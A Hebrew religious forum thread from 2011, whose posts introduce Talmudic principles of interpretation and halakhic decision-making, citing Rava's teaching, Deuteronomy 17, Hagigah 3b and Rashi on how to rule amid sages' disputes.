[אמר להם רבא לרב פפא ולרב הונא בנו של רב יהושע, שני תלמידיו הגדולים: אם יבוא פסק דין שלי לפניכם ותראו בו פרכה, אל תבטלוהו ואל תקרעו את השטר עד שתבואו אלי. אם יהיה לי טעם, אומר לכם, ואם לא, אחזור בי. לאחר שאמות, אל תקרעו את השטר וגם אל תלמדו ממנו. לא תקרעו כי אילו הייתי שם אולי הייתי אומר לכם טעם. ללמוד גם אין ללמוד ממנו, כי אין לדיין אלא מה שעיניו רואות].

יש מקום ללמוד מכאן שתלמיד חכם אינו מחוייב אפילו לרבו אלא לאמת. אלא שצריך להיזהר, וכיון שאין התלמיד יכול להיות בטוח לחלוטין בצדקתו, עליו לשמור על מסורת הפסק השני בתוך הלימוד הישיבתי, אבל למעשה אסור לו להסתמך עליה.

זו גישה אחת. אבל יש מערערים עליה. אם בגלל שהיא נאמרה רק בדיני ממונות, אם בגלל שהיא נאמרה רק לשני תלמידי רבא הגדולים ומי יכול לומר שהוא בדרגה זו.

שוב, מחלוקת של גישות.

דדווח על תוכן פוגעני

נשלח ב-19/8/2011 18:08 לינק ישיר 

א.      ב. סוגי השאלות וכיצד מחפשים עליהן תשובה.

אני חוזר על הנאמר לעיל:

יש שאלות חדשות, ויש שאלות מתחדשות כיון שהתשובה עליהן נשכחה. זה קורה ב"דאורייתא" (בדינים מן התורה) וזה קורה ב"דרבנן" (תקנות חכמים וגזירותיהם).

מה עושים? ומי עושה?

כבר התורה דנה באפשרות הזו וקובעת לנו:

דברים פרק יז

(ח) כִּי יִפָּלֵא מִמְּךָ דָבָר לַמִּשְׁפָּט בֵּין דָּם לְדָם בֵּין דִּין לְדִין וּבֵין נֶגַע לָנֶגַע דִּבְרֵי רִיבֹת בִּשְׁעָרֶיךָ וְקַמְתָּ וְעָלִיתָ אֶל הַמָּקוֹם אֲשֶׁר יִבְחַר יְקֹוָק אֱלֹהֶיךָ בּוֹ:

(ט) וּבָאתָ אֶל הַכֹּהֲנִים הַלְוִיִּם וְאֶל הַשֹּׁפֵט אֲשֶׁר יִהְיֶה בַּיָּמִים הָהֵם וְדָרַשְׁתָּ וְהִגִּידוּ לְךָ אֵת דְּבַר הַמִּשְׁפָּט:

(י) וְעָשִׂיתָ עַל פִּי הַדָּבָר אֲשֶׁר יַגִּידוּ לְךָ מִן הַמָּקוֹם הַהוּא אֲשֶׁר יִבְחַר יְקֹוָק וְשָׁמַרְתָּ לַעֲשׂוֹת כְּכֹל אֲשֶׁר יוֹרוּךָ:

(יא) עַל פִּי הַתּוֹרָה אֲשֶׁר יוֹרוּךָ וְעַל הַמִּשְׁפָּט אֲשֶׁר יֹאמְרוּ לְךָ תַּעֲשֶׂה לֹא תָסוּר מִן הַדָּבָר אֲשֶׁר יַגִּידוּ לְךָ יָמִין וּשְׂמֹאל:

(יב) וְהָאִישׁ אֲשֶׁר יַעֲשֶׂה בְזָדוֹן לְבִלְתִּי שְׁמֹעַ אֶל הַכֹּהֵן הָעֹמֵד לְשָׁרֶת שָׁם אֶת יְקֹוָק אֱלֹהֶיךָ אוֹ אֶל הַשֹּׁפֵט וּמֵת הָאִישׁ הַהוּא וּבִעַרְתָּ הָרָע מִיִּשְׂרָאֵל:

(יג) וְכָל הָעָם יִשְׁמְעוּ וְיִרָאוּ וְלֹא יְזִידוּן עוֹד:

ואולי התשובה הזו היתה יפה לאותה שעה שבה יש מוסד מרכזי כמו הסנהדרין, שבו יושבים חכמים יחד. וגם, כפי שהגמרא מציעה להבין וכפי שנאמר בתורה במקום אחר, יתכן שהחכמים לא ישתוו ביניהם. ואז נוהגים לפי הרוב. (ואז יש שאלה: מה יקרה אם הרוב טועה? ואין לומר שהרוב לא יטעה בוודאי, כי תמיד יש אפשרות כזו, ואפילו בית הדין הגדול עלולים לטעות ולהתיר עבודה זרה! כמובן, בדרך כלל אפשר לסמוך על בית הדין שלא יטעו. וממילא, הדילמה אם בית דין צודקים או לא אינה מסורה למי שלא למד ולא ידע אלא לחכמים.

מסורת נוספת ושונה כיצד להכריע בשאלות חדשות או מתחדשות מוצגת בתלמוד. כאשר יש מחלוקת ואין בה הכרעה, התלמוד מציע את הגישה הבאה:

תלמוד בבלי מסכת חגיגה דף ג עמוד ב

עלי אספות - אלו תלמידי חכמים שיושבין אסופות אסופות ועוסקין בתורה, הללו מטמאין והללו מטהרין, הללו אוסרין והללו מתירין, הללו פוסלין והללו מכשירין. שמא יאמר אדם: היאך אני למד תורה מעתה? תלמוד לומר: כולם נתנו מרעה אחד – א-ל אחד נתנן, פרנס אחד אמרן, מפי אדון כל המעשים ברוך הוא, דכתיב +שמות כ'+ וידבר א-להים את כל הדברים האלה. אף אתה עשה אזניך כאפרכסת, וקנה לך לב מבין לשמוע את דברי מטמאים ואת דברי מטהרים, את דברי אוסרין ואת דברי מתירין, את דברי פוסלין ואת דברי מכשירין.

ופירש רש"י שם

עשה אזניך כאפרכסת - מאחר שכולן לבן לשמים - עשה אזנך שומעת ולמוד, ודע דברי כולן, וכשתדע להבחין אי זה יכשר - קבע הלכה כמותו.

צריך ללמוד עד שמבינים ויודעים ואז מוצאים את התשובה איך לנהוג.

אולם למי אומרת הגמרא ולמי אומר רש"י את הדברים האלו? לכל אדם? לתלמיד חכם? לאיזו דרגה של תלמיד חכם? מה צריך לדעת כדי להכריע? אילו ידיעות ואלו כישורים נדרשים לשם כך?

כאשר התלמיד לומד ונראה בעיניו שכבר הבין, איך ידע שהוא באמת מבין ולא משלה את עצמו?

ואם תלמיד חכם הגיע למסקנות ורוצה להכריע, האם ההכרעה היא עבור עצמו או גם עבור אחרים?

כפי שנראה לקמן גם כאן יש גישות..

דדווח על תוכן פוגעני

נשלח ב-19/8/2011 18:07 לינק ישיר 

א.      מבוא לתלמוד

לא בפעם הראשונה צריך לכתוב מבוא לתורה שבעל פה וללימוד שלה, גם אם רוב הקוראים כאן מכירים אותם מקוםדם. הנה סיכום טוב ומפורט יותר שכבר התפרסם.

הרב יואל קלופט הגמראים והמיימוניים

http://www.bhol.co.il/forums/topic.asp?topic_id=2899674&whichpage=1&forum_id=1364#R_11

אבל אני חוזר על העיקר שדרוש עבור ההמשך.

משה קיבל תורה מסיני. התורה כללה כללים ופרטים. יש מצוות ויש פרטים של מצוות. מצות תפילין כוללת תפילין של ראש ושל יד, הפרטים נוגעים לתוכן הפרשיות, לעשיית הבתים, להכנת הרצועות וקשירתן, לאירגון הפרשיות בבתים ועוד ועוד. ניתנה מצות שבת וניתנו אבות מלאכות.

אבל יש פרטים שלא ניתנו (האם משה קיבל דיני מיקרוגל בשבת?) ויש פרטים שניתנו ונשכחו (לפי דוגמא של הגמרא: מקרים שבהם יש קרבן שיש בו קדושת חטאת אבל אי אפשר להקריבו, וצריך לדעת מה ייעשה בו. יש חמש דוגמאות כאלו ורק אחת, לפי דעה אחת בגמרא, היא ממש הלכה למשה מסיני).

כיון שהתורה זקוקה לפרשנות, הוטלה המשימה הזו, לדור ודור, על חכמים הראויים לכך.

חכמים פירשו לפי כללי התורה שהיו בידיהם והכריעו מה הדין בשאלות החדשות (=שלא נודעו קודם) או המתחדשות (=שהיו ונשכחו).

אמנם כיון שיש שני צדדים לפחות לכל שאלה, נמצא מחלוקות בין חכמים מה ראוי לעשות. להחמיר או להקל, לטמא או לטהר, לאסור או להתיר. ואם יש מחלוקת, עולה השאלה כיצד יש לנהוג. וגם בשאלה זו יש מחלוקת. ולקמן נדון בכך ביתר הרחבה וכאן רק אדגיש שזה המצב הטבעי של מסירת התורה. אין מנוס ממחלוקות כאלו ואין קיומן של מחלוקות חסרון אלא הכרח.

כמו כן, התורה הטילה על חכמים לעשות סייג לתורה. להרחיב איסורים, להוסיף תקנות. לפעמים לצמצם ולהקל.

וכפי שיש מחלוקות לגבי פרשנות התורה, כך יש מחלוקות במשך הדורות לגבי התקנות, לגבי טעמן, לגבי פרטיהן, לגבי יישומן במצבים משתנים. יש תקנות שטעמן לא התבאר די הצורך, יש תקנות שטעמן ופירוטן נשכח, יש מצבים חדשים ושאלות חדשות, ויש גם שנולדו צרכים חדשים שיכולים לדעת קצת חכמים לגרום לשינוי בדין המקורי לפי צורך הזמן והמקום.

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > מבוא לכללי הפרשנות והפסק לפי התלמוד והראשונים
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר

bholext